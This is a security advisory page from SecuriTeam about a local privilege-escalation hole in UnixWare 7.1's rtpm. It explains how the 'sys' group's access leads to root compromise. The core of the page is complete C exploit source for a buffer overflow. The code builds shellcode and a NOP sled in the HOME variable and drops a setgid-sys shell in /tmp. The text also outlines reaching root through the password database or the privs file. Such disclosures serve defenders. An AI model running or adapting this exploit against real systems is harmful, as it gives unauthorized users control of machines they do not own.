SecuriTeam - UnixWare rtpm exploit

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

Any local user can exploit a bug in rtpm to gain "sys" account privileges. A root compromise is then trivial, since the "sys" privileges are equivalent to root.

Credit:
The information was provided by: Brock Tellier.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
UnixWare 7.1

UnixWare has a slightly different system of managing the password database than Linux/BSD/Solaris and the like. In addition to the conventional /etc/passwd and /etc/shadow, UnixWare keeps a copy of these files (including encrypted passwords) in /etc/security/ia/master and /etc/security/ia/omaster. These are binary files containing the same information as /etc/passwd and /etc/shadow in a different format. Various UnixWare C functions can be used to access this information. Some programs use this file for authentication purposes, instead of /etc/shadow, such as the i2odialog daemon.

A major security hole opens up once the group "sys" is able to read from this database. If there were no programs setgid sys, this would not be a problem, however UnixWare's owner/group scheme relies very heavily on this group. /dev/*mem* is readable by sys (instead of having a separate kmem group) and many key directories, such as /sbin, and critical binaries are writable by this group. The /etc/security/tcb/privs database (which controls which non-suid/sgid programs gain additional privileges) is also writable by sys. As a consequence, many programs which need to access /dev/kmem and various other config files are sgid sys instead of sgid/suid to a more specialized group. Once we have exploited one of these programs to gain the gid of sys, we have nearly full control over the system.

Vulnerability details:
A simple buffer overflow in /usr/sbin/rtpm will allow us to gain sys privileges. From there, you can strings(1) the /etc/security/ia/master file for the encrypted root password or inject a shell into the /etc/security/tcb/privs file. Either of these will lead to a fairly quick root compromise.

Exploit:
A small warning about this exploit: Rtpm is one of those ASCII GUI programs that messes with your term. If it doesn't exit normally, it will leave you with a mostly unusable session. For this reason, this exploit will drop /tmp/ksh as sgid-sys and exit. After you run the exploit, you'll probably need to forcefully logout (exit might not work) then log back in to get your privs. The default offset should work, but if it doesn't you should write a script to change it rather than deal with logging out/in every time you want to change your offset.

/**
** uwrtpm.c - UnixWare 7.1 rtpm exploit
**
**
** Drops a setgid sys shell in /tmp/ksh.  We can't exec a shell because
** rtpm screws up our terminal when it exits abnormally.  After running
** this exploit, you must forcefully exit your shell and re-login to exec
** your sys shell.
**
** cc -o uwrtpm uwrtpm.c; ./rtpm <offset>
** use offsets of +-100
**
** Brock Tellier btellier@usa.net
**
**/

#include <stdlib.h>
#include <stdio.h>

char scoshell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/rt\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define ALIGN 3
#define LEN 1100
#define NOP 0x90
#define SYSSHELL "void main() {setregid(3,3);system(\"cp /bin/ksh \
/tmp/ksh; chgrp sys /tmp/ksh; chmod 2555 /tmp/ksh\"); } "

void buildrt() {
  FILE *fp;
  char cc[100];
  fp = fopen("/tmp/rt.c", "w");

  fprintf(fp, SYSSHELL);

  fclose(fp);
  snprintf(cc, sizeof(cc), "cc -o /tmp/rt /tmp/rt.c");
  system(cc);

}

int main(int argc, char *argv[]) {

long int offset=0;

int i;
int buflen = LEN;
long int addr;
char buf[LEN];

if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
exit(0);
}
else if (argc == 2){
   offset=atoi(argv[1]);

}
else if (argc == 3) {
  offset=atoi(argv[1]);
  buflen=atoi(argv[2]);

}
else {
   offset=0;
   buflen=1100;

}

buildrt();
addr=0x8046a01 + offset;

fprintf(stderr, "\nUnixWare 7.1 rtpm exploit drops a setgid sys shell ");
fprintf(stderr, "in /tmp/ksh\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+ALIGN;i<buflen-4;i+=4)
*(int *)&buf[i]=addr;

memcpy(buf, "HOME=", 5);
buf[buflen - 1] = 0;
putenv(buf);
execl("/usr/sbin/rtpm", "rtpm", NULL);

exit(0);
}

blog comments powered by Disqus

	Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit
	IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
	Progea Movicon TCPUploadServer Remote Exploit
	Trango Broadband Wireless Rogue SU Authentication Bug
	Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow
	Family Connections Multiple Remote Vulnerabilities
	VideoCache vccleaner Root Vulnerability
	QuickHeal Antivirus 2010 Local Privilege Escalation
	DubSite CMS Cross Site Request Forgery Vulnerability
	SonicWall Global Management System XSS Vulnerability
	Sonicwall NSA E7500 XSS Vulnerability
	Juniper Security Threat Response Manager XSS Vulnerability
	Hacking CSRF Tokens using CSS History Hack
	Sun Java System Identiy Manager Users Enumeration
	Microsoft Internet Explorer XML Buffer Overflow (Exploit)